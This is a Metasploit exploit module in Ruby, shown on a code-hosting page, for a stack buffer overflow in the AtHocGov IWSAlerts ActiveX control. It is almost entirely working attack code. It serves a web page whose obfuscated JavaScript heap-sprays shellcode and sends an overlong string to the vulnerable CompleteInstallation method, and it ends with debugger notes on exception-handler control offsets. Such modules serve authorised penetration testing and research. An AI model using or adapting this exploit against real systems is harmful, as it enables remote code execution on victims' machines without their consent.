CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
Path: blob/master/modules/exploits/windows/browser/athocgov_completeinstallation.rb
Views: 1904
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = NormalRanking78include Msf::Exploit::Remote::HttpServer::HTML910def initialize(info = {})11super(update_info(info,12'Name' => 'AtHocGov IWSAlerts ActiveX Control Buffer Overflow',13'Description' => %q{14This module exploits a stack buffer overflow in AtHocGov IWSAlerts. When15sending an overly long string to the CompleteInstallation() method of AtHocGovTBr.dll16(6.1.4.36) an attacker may be able to execute arbitrary code. This17vulnerability was silently patched by the vendor.18},19'License' => MSF_LICENSE,20'Author' => [ 'MC' ],21'References' =>22[23[ 'OSVDB', '94557' ]24],25'DefaultOptions' =>26{27'EXITFUNC' => 'process',28},29'Payload' =>30{31'Space' => 1024,32'BadChars' => "\x00",33},34'Platform' => 'win',35'Targets' =>36[37[ 'Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7', { 'Ret' => '' } ]38],39'DisclosureDate' => '2008-02-15',40'DefaultTarget' => 0))4142register_options(43[44OptString.new('URIPATH', [ true, "The URI to use.", "/" ])45])46end4748def autofilter49false50end5152def check_dependencies53use_zlib54end5556def on_request_uri(cli, request)57# Re-generate the payload.58return if ((p = regenerate_payload(cli)) == nil)5960# Encode the shellcode.61shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))6263ret = Rex::Text.uri_encode(Metasm::Shellcode.assemble(Metasm::Ia32.new, "or cl,[edx]").encode_string * 2)6465js = %Q|66try {67var evil_string = "";68var index;69var vulnerable = new ActiveXObject('AtHocGovGSTlBar.GSHelper.1');70var my_unescape = unescape;71var shellcode = '#{shellcode}';72#{js_heap_spray}73sprayHeap(my_unescape(shellcode), 0x0a0a0a0a, 0x40000);74for (index = 0; index < 12500; index++) {75evil_string = evil_string + my_unescape('#{ret}');76}77vulnerable.CompleteInstallation(evil_string);78} catch( e ) { window.location = 'about:blank' ; }79|8081opts = {82'Strings' => true,83'Symbols' => {84'Variables' => [85'vulnerable',86'shellcode',87'my_unescape',88'index',89'evil_string',90]91}92}93js = ::Rex::Exploitation::ObfuscateJS.new(js, opts)94js.update_opts(js_heap_spray.opts)95js.obfuscate(memory_sensitive: true)96content = %Q|97<html>98<body>99<script><!--100#{js}101//</script>102</body>103</html>104|105106print_status("Sending #{self.name}")107108# Transmit the response to the client109send_response_html(cli, content)110111# Handle the payload112handler(cli)113end114115end116=begin117IDL info...118[id(0x00000022)]119HRESULT CompleteInstallation([in] BSTR strParam);120121$~/trunk/./msfpescan -f AtHocGovTBr.dll122AtHocGovTBr.dll: Microsoft Visual C++ v7.1 EXE [165]123AtHocGovTBr.dll: Microsoft Visual C++ v7.1 DLL [159]124125// smash /GS126$~/trunk/./msfpescan -i AtHocGovTBr.dll | grep SecurityCookie127SecurityCookie 0x4278193c128129// /SafeSEH, not today.130$~/trunk/./msfpescan -i AtHocGovTBr.dll | grep SEH131SEHandlerTable 0x42774e40132SEHandlerCount 0x0000021b1331340:000> !exchain1350013cae0: ntdll!_except_handler3+0 (7c90ee18)136CRT scope 0, filter: ntdll!RtlFreeHeap+613 (7c93bec5)137func: ntdll!RtlFreeHeap+617 (7c93bece)1380013cb1c: AtHocGovTBr!SetOfflineInstall+a0b4 (4274f944)1390013dd9c: 61473161140Invalid exception stack at 473061471410:000> !pattern_offset 5140 0x47306147142[Byakugan] Control of 0x47306147 at offset 4680.1430:000> !pattern_offset 5140 0x61473161144[Byakugan] Control of 0x61473161 at offset 4684.145=end146147148